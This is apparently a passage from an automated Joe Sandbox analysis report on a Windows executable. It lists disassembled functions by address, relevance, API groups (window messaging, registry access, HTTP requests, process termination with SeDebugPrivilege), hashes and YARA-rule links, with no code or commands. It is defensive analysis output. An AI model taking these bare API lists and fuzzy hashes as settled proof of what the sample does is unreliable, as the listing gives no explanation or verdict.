                                                                                                                    • Associated: 00000010.00000002.1753661809.00007FF656095000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753661809.00007FF6560B8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753717130.00007FF6560CA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753740589.00007FF6560D4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_16_2_7ff655fe0000_BnQwAP.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Window$MessageSend$LongShow$DeleteFocusInvalidateObjectRect
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3210457359-0
                                                                                                                    • Opcode ID: 33ab6cce80c9e0840b45516de4cf550524ae496078474d2d7534a7033dd0db45
                                                                                                                    • Instruction ID: 597643bbe322f09b06cfdf080fa7472934dbcf8a8bf54a0df0c1b4c467a0db29
                                                                                                                    • Opcode Fuzzy Hash: 33ab6cce80c9e0840b45516de4cf550524ae496078474d2d7534a7033dd0db45
                                                                                                                    • Instruction Fuzzy Hash: AF61B425A0864386FB74DB25D6417BA2671AF807B8F184131DA1EA36E5CE7FE889D700
                                                                                                                    Function 00007FF65607E580 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 138COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000010.00000002.1753585817.00007FF655FE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF655FE0000, based on PE: true
                                                                                                                    • Associated: 00000010.00000002.1753559960.00007FF655FE0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753661809.00007FF656095000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753661809.00007FF6560B8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753717130.00007FF6560CA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753740589.00007FF6560D4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_16_2_7ff655fe0000_BnQwAP.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Process$CloseErrorHandleLastOpen$CreateFirstProcess32SnapshotTerminateToolhelp32
                                                                                                                    • String ID: SeDebugPrivilege
                                                                                                                    • API String ID: 2533919879-2896544425
                                                                                                                    • Opcode ID: 4f21c35d0a4ac780837a5a8e5dc6f68c18b89875e417af61e1445dd9dd8e1fe8
                                                                                                                    • Instruction ID: 1f37d3a683c1f43962ea75c1254f566ba196a41d45b10d820025960434cf1316
                                                                                                                    • Opcode Fuzzy Hash: 4f21c35d0a4ac780837a5a8e5dc6f68c18b89875e417af61e1445dd9dd8e1fe8
                                                                                                                    • Instruction Fuzzy Hash: 00518066A0868282EB14DF26D19537C7B60FF84F99F098435D60DA7792DF7DE509CB00
                                                                                                                    Function 00007FF65605A070 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 135windowCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000010.00000002.1753585817.00007FF655FE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF655FE0000, based on PE: true
                                                                                                                    • Associated: 00000010.00000002.1753559960.00007FF655FE0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753661809.00007FF656095000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753661809.00007FF6560B8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753717130.00007FF6560CA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753740589.00007FF6560D4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_16_2_7ff655fe0000_BnQwAP.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Menu$Item$CountCreateInfoInsertPopup
                                                                                                                    • String ID: 2$P
                                                                                                                    • API String ID: 93392585-1110268094
                                                                                                                    • Opcode ID: 46a49604fdc7cbe7f64919669a233ff3b62d38c72d86d24d888cad9356e87a30
                                                                                                                    • Instruction ID: 35779e6724a955ebbf08f7348a23edd1a39186d44a9d4bc0e68a2f6c61094992
                                                                                                                    • Opcode Fuzzy Hash: 46a49604fdc7cbe7f64919669a233ff3b62d38c72d86d24d888cad9356e87a30
                                                                                                                    • Instruction Fuzzy Hash: E551D432E0865289F720CF66E6402BD37E1BF60758F284135DA5EA3694DF3EE889C700
                                                                                                                    Function 00007FF65608E248 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 129windowCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000010.00000002.1753585817.00007FF655FE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF655FE0000, based on PE: true
                                                                                                                    • Associated: 00000010.00000002.1753559960.00007FF655FE0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753661809.00007FF656095000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753661809.00007FF6560B8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753717130.00007FF6560CA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753740589.00007FF6560D4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_16_2_7ff655fe0000_BnQwAP.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Window$LongMessageSend$Show
                                                                                                                    • String ID: '
                                                                                                                    • API String ID: 257662517-1997036262
                                                                                                                    • Opcode ID: eb894a93846cd46a5342e3ebb468783be677627f1867a2ee8fe2f5b975b70651
                                                                                                                    • Instruction ID: b4db496f6dfd941dc2acf2bf317ce2be343866ec27613526aa7d4bfc2a66459c
                                                                                                                    • Opcode Fuzzy Hash: eb894a93846cd46a5342e3ebb468783be677627f1867a2ee8fe2f5b975b70651
                                                                                                                    • Instruction Fuzzy Hash: D6510B32A0864681E360DB66A558A7D3761FB85B94F5C4132CE5EA37B0CF3EED4AC700
                                                                                                                    Function 00007FF65605AD94 Relevance: 12.3, APIs: 2, Strings: 5, Instructions: 70windowCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000010.00000002.1753585817.00007FF655FE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF655FE0000, based on PE: true
                                                                                                                    • Associated: 00000010.00000002.1753559960.00007FF655FE0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753661809.00007FF656095000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753661809.00007FF6560B8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753717130.00007FF6560CA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753740589.00007FF6560D4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_16_2_7ff655fe0000_BnQwAP.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: IconLoad_invalid_parameter_noinfo
                                                                                                                    • String ID: blank$info$question$stop$warning
                                                                                                                    • API String ID: 4060274358-404129466
                                                                                                                    • Opcode ID: a20ad64d4c1f0ff606b53834bd72c3c9b388472799770000db1625183137431d
                                                                                                                    • Instruction ID: 4d84aa13c948caec5f9085157d907628952d8b2df93ef5d49e2f5f83249eb09e
                                                                                                                    • Opcode Fuzzy Hash: a20ad64d4c1f0ff606b53834bd72c3c9b388472799770000db1625183137431d
                                                                                                                    • Instruction Fuzzy Hash: 0C216D21B0C79381FA559F16AB0017AA395BF55B90F4C5035DD4DA7396FE7EE40AC300
                                                                                                                    Function 00007FF65605C5C8 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 39windowCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000010.00000002.1753585817.00007FF655FE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF655FE0000, based on PE: true
                                                                                                                    • Associated: 00000010.00000002.1753559960.00007FF655FE0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753661809.00007FF656095000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753661809.00007FF6560B8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753717130.00007FF6560CA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753740589.00007FF6560D4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_16_2_7ff655fe0000_BnQwAP.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: HandleLoadModuleString$Messagewprintf
                                                                                                                    • String ID: %s (%d) : ==> %s: %s %s
                                                                                                                    • API String ID: 4051287042-3128320259
                                                                                                                    • Opcode ID: f7e86a73b67135bbf4198df281c36ffde702979d794fcff8f2d08bb660d9317c
                                                                                                                    • Instruction ID: 766b77cbc83f1e7af05db630e671b92d5dc0124eec3f18f1ecd598177b883bae
                                                                                                                    • Opcode Fuzzy Hash: f7e86a73b67135bbf4198df281c36ffde702979d794fcff8f2d08bb660d9317c
                                                                                                                    • Instruction Fuzzy Hash: 0811C471B28B8595E7358B20F5417FA2365FB98748F88403AEA4EA3B58DE7DC24DC700
                                                                                                                    Function 00007FF65609233C Relevance: 12.3, APIs: 8, Instructions: 254windowCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000010.00000002.1753585817.00007FF655FE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF655FE0000, based on PE: true
                                                                                                                    • Associated: 00000010.00000002.1753559960.00007FF655FE0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753661809.00007FF656095000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753661809.00007FF6560B8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753717130.00007FF6560CA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753740589.00007FF6560D4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_16_2_7ff655fe0000_BnQwAP.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Window$MessageMetricsSendSystem$InvalidateLongMoveProcRectShow
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1211466189-0
                                                                                                                    • Opcode ID: e4483054fe90d725006c88ea8490581a4df116f0e1f8785d266180591fe398c1
                                                                                                                    • Instruction ID: a807c3d1ddea9e9ed4940cf07d951f1c271bba68af84351ce6b8c7098f25f213
                                                                                                                    • Opcode Fuzzy Hash: e4483054fe90d725006c88ea8490581a4df116f0e1f8785d266180591fe398c1
                                                                                                                    • Instruction Fuzzy Hash: 0FA1183672868382E7788F26D25477977A2FB44B48F185035DE0EA3A94DF3EE859C700
                                                                                                                    Function 00007FF65607FCC0 Relevance: 12.2, APIs: 8, Instructions: 246registryCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000010.00000002.1753585817.00007FF655FE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF655FE0000, based on PE: true
                                                                                                                    • Associated: 00000010.00000002.1753559960.00007FF655FE0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753661809.00007FF656095000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753661809.00007FF6560B8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753717130.00007FF6560CA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753740589.00007FF6560D4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_16_2_7ff655fe0000_BnQwAP.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Close$BuffCharConnectDeleteOpenRegistryUpperValue
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 50796853-0
                                                                                                                    • Opcode ID: f5a1a67ecd9b101a11fc5f9cb9367f83b4f1b47b2c9f0c1f4c44b8d49d3bc558
                                                                                                                    • Instruction ID: 38a8cbf9bcf450abec8a9a74eee4c7e41710a3da843119f4e4e3f060a8c06c86
                                                                                                                    • Opcode Fuzzy Hash: f5a1a67ecd9b101a11fc5f9cb9367f83b4f1b47b2c9f0c1f4c44b8d49d3bc558
                                                                                                                    • Instruction Fuzzy Hash: DEB1DF36B08A4286EB50DF65D1953BD2760FF85B88F084431EA4EA7B96CF3DD50ACB04
                                                                                                                    Function 00007FF65600443C Relevance: 12.1, APIs: 8, Instructions: 124COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000010.00000002.1753585817.00007FF655FE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF655FE0000, based on PE: true
                                                                                                                    • Associated: 00000010.00000002.1753559960.00007FF655FE0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753661809.00007FF656095000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753661809.00007FF6560B8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753717130.00007FF6560CA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753740589.00007FF6560D4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_16_2_7ff655fe0000_BnQwAP.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: ShowWindow
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1268545403-0
                                                                                                                    • Opcode ID: cc21e6db9a044589e755c4703016b6e1d9c57170080a8525f9bf3d2d7d54c8f4
                                                                                                                    • Instruction ID: a81a42c70a570843fd7f4146eea0f4c4caba6a437082e932edda7fa8db1653c2
                                                                                                                    • Opcode Fuzzy Hash: cc21e6db9a044589e755c4703016b6e1d9c57170080a8525f9bf3d2d7d54c8f4
                                                                                                                    • Instruction Fuzzy Hash: AE51C535E0C182D8F7B59F29D64437D2691AF91B19F5C4231C54EE36D9CE6FA48CC204
                                                                                                                    Function 00007FF6560890A8 Relevance: 12.1, APIs: 8, Instructions: 102windowCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000010.00000002.1753585817.00007FF655FE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF655FE0000, based on PE: true
                                                                                                                    • Associated: 00000010.00000002.1753559960.00007FF655FE0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753661809.00007FF656095000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753661809.00007FF6560B8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753717130.00007FF6560CA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753740589.00007FF6560D4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_16_2_7ff655fe0000_BnQwAP.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: MessageSend$CapsCreateDeleteDeviceFontMoveObjectReleaseWindow
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3864802216-0
                                                                                                                    • Opcode ID: 51e6ec7aa37fc3003482106919c843e152de56e0f8813b4e66b1a7a4e18ad1cb
                                                                                                                    • Instruction ID: b775314003b399c2920163a3ef258cb00e36eae3b9954ae9fdc2a50f9d52ffc9
                                                                                                                    • Opcode Fuzzy Hash: 51e6ec7aa37fc3003482106919c843e152de56e0f8813b4e66b1a7a4e18ad1cb
                                                                                                                    • Instruction Fuzzy Hash: CE41BE7661868187E724CB22F514B6ABBA1F788BD5F144131EF8A53B14DF3DD444CB00
                                                                                                                    Function 00007FF655FE2100 Relevance: 10.7, APIs: 7, Instructions: 246COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000010.00000002.1753585817.00007FF655FE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF655FE0000, based on PE: true
                                                                                                                    • Associated: 00000010.00000002.1753559960.00007FF655FE0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753661809.00007FF656095000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753661809.00007FF6560B8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753717130.00007FF6560CA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753740589.00007FF6560D4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_16_2_7ff655fe0000_BnQwAP.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: ObjectSelect$BeginCreatePath
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3225163088-0
                                                                                                                    • Opcode ID: e150efe4bbb5a68fe2f4df4e615a944ed6587934d7859263685a3daad39b8607
                                                                                                                    • Instruction ID: eafdad7030f51f147c297720cb91e8dbf08332c04092e0ae544b58c456d851da
                                                                                                                    • Opcode Fuzzy Hash: e150efe4bbb5a68fe2f4df4e615a944ed6587934d7859263685a3daad39b8607
                                                                                                                    • Instruction Fuzzy Hash: AAA1C176A0C6C187E7748F5AE40466EBB71FB85B98F144125EA8963B68CF3DD846CF00
                                                                                                                    Function 00007FF65608FB28 Relevance: 10.7, APIs: 7, Instructions: 212windowCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000010.00000002.1753585817.00007FF655FE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF655FE0000, based on PE: true
                                                                                                                    • Associated: 00000010.00000002.1753559960.00007FF655FE0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753661809.00007FF656095000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753661809.00007FF6560B8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753717130.00007FF6560CA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753740589.00007FF6560D4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_16_2_7ff655fe0000_BnQwAP.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: MessageSendWindow$Enabled
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3694350264-0
                                                                                                                    • Opcode ID: e552656ad26ad0b4c81c10bd500660535feecaec2312c49fbee9d36c63c42a0a
                                                                                                                    • Instruction ID: 2a37fe9ceff6b4e7c4fcd82c01af3bd412fe0b1d76274c88ace6ee877ea16da6
                                                                                                                    • Opcode Fuzzy Hash: e552656ad26ad0b4c81c10bd500660535feecaec2312c49fbee9d36c63c42a0a
                                                                                                                    • Instruction Fuzzy Hash: 95918E21E0964686FB74DA25D6543B973A2AF84BC4F5C4032CA4DA37A3DF3EE599C301
                                                                                                                    Function 00007FF656059034 Relevance: 10.7, APIs: 7, Instructions: 153windowCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000010.00000002.1753585817.00007FF655FE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF655FE0000, based on PE: true
                                                                                                                    • Associated: 00000010.00000002.1753559960.00007FF655FE0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753661809.00007FF656095000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753661809.00007FF6560B8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753717130.00007FF6560CA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753740589.00007FF6560D4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_16_2_7ff655fe0000_BnQwAP.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: MessagePost$KeyboardState$Parent
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 87235514-0
                                                                                                                    • Opcode ID: f9339e9b515e9b8f23d28b48758f4b43b45cdaeeceea552a0e587170ddb5bff8
                                                                                                                    • Instruction ID: 6430ef2f4eae929bcea466cb6ce032ae49fbb4aa1dc2017baad9ce99cf65b0e6
                                                                                                                    • Opcode Fuzzy Hash: f9339e9b515e9b8f23d28b48758f4b43b45cdaeeceea552a0e587170ddb5bff8
                                                                                                                    • Instruction Fuzzy Hash: EB512622A0D2E156FF318B725200A7D2F91FB56BC4F4C9075DA8967B46CE2EE858CB10
                                                                                                                    Function 00007FF65606DBF0 Relevance: 10.6, APIs: 7, Instructions: 137networkCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000010.00000002.1753585817.00007FF655FE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF655FE0000, based on PE: true
                                                                                                                    • Associated: 00000010.00000002.1753559960.00007FF655FE0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753661809.00007FF656095000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753661809.00007FF6560B8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753717130.00007FF6560CA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753740589.00007FF6560D4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_16_2_7ff655fe0000_BnQwAP.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Internet$CloseConnectErrorEventHandleHttpLastOpenRequest
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3401586794-0
                                                                                                                    • Opcode ID: 253a407ca22485da5ca56320f2061644023828f6bd6f560db9f49e2617228af6
                                                                                                                    • Instruction ID: fe585be7a7d4c84425502d812a89e002df1faa4de18dcbafa865d0abbece71a0
                                                                                                                    • Opcode Fuzzy Hash: 253a407ca22485da5ca56320f2061644023828f6bd6f560db9f49e2617228af6
                                                                                                                    • Instruction Fuzzy Hash: 6F51D57660879286F714DF22EA10AAE77A1FB48B8CF184031DE0D67B54DF3AD49AC740
                                                                                                                    Function 00007FF656054860 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 124comlibraryloaderCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000010.00000002.1753585817.00007FF655FE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF655FE0000, based on PE: true
                                                                                                                    • Associated: 00000010.00000002.1753559960.00007FF655FE0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753661809.00007FF656095000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753661809.00007FF6560B8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753717130.00007FF6560CA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753740589.00007FF6560D4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_16_2_7ff655fe0000_BnQwAP.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: From$ErrorModeProg$AddressCreateFreeInstanceProcStringTasklstrcmpi
                                                                                                                    • String ID: DllGetClassObject
                                                                                                                    • API String ID: 668425406-1075368562
                                                                                                                    • Opcode ID: 214bc254c47588fde01e5fc27ee3c6930efb076d9c02937a19424ffc77af6643
                                                                                                                    • Instruction ID: 87b87f3d470b83dfb73acd07a19a70c08708600e05fb2f982b5c7b4a26dcc77b
                                                                                                                    • Opcode Fuzzy Hash: 214bc254c47588fde01e5fc27ee3c6930efb076d9c02937a19424ffc77af6643
                                                                                                                    • Instruction Fuzzy Hash: 80516F72A18B4696EB54CF26D6443B96361FB54B84F088234DB4DA7A45DF7EF068C700
                                                                                                                    Function 00007FF656089248 Relevance: 10.6, APIs: 7, Instructions: 111windowCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000010.00000002.1753585817.00007FF655FE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF655FE0000, based on PE: true
                                                                                                                    • Associated: 00000010.00000002.1753559960.00007FF655FE0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753661809.00007FF656095000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753661809.00007FF6560B8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753717130.00007FF6560CA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753740589.00007FF6560D4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_16_2_7ff655fe0000_BnQwAP.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: LongMessageSendWindow
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3360111000-0
                                                                                                                    • Opcode ID: 10b92532f4478cd50d58fa8196457338f991273d8d1c085252422c4c1f4f913a
                                                                                                                    • Instruction ID: 037f6ff415dceb637fec593ea8ce9c1ab4af607838ebd297b8cefa1e641ee4a9
                                                                                                                    • Opcode Fuzzy Hash: 10b92532f4478cd50d58fa8196457338f991273d8d1c085252422c4c1f4f913a
                                                                                                                    • Instruction Fuzzy Hash: AB414435B19A4581EB60DB1AE6906793361EBC4F94F694132CE1E97BA5CF3EE849C300
                                                                                                                    Function 00007FF6560737A8 Relevance: 10.6, APIs: 7, Instructions: 103networkCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000010.00000002.1753585817.00007FF655FE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF655FE0000, based on PE: true
                                                                                                                    • Associated: 00000010.00000002.1753559960.00007FF655FE0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753661809.00007FF656095000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753661809.00007FF6560B8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753717130.00007FF6560CA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753740589.00007FF6560D4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_16_2_7ff655fe0000_BnQwAP.jbxd
                                                                                                                    Similarity
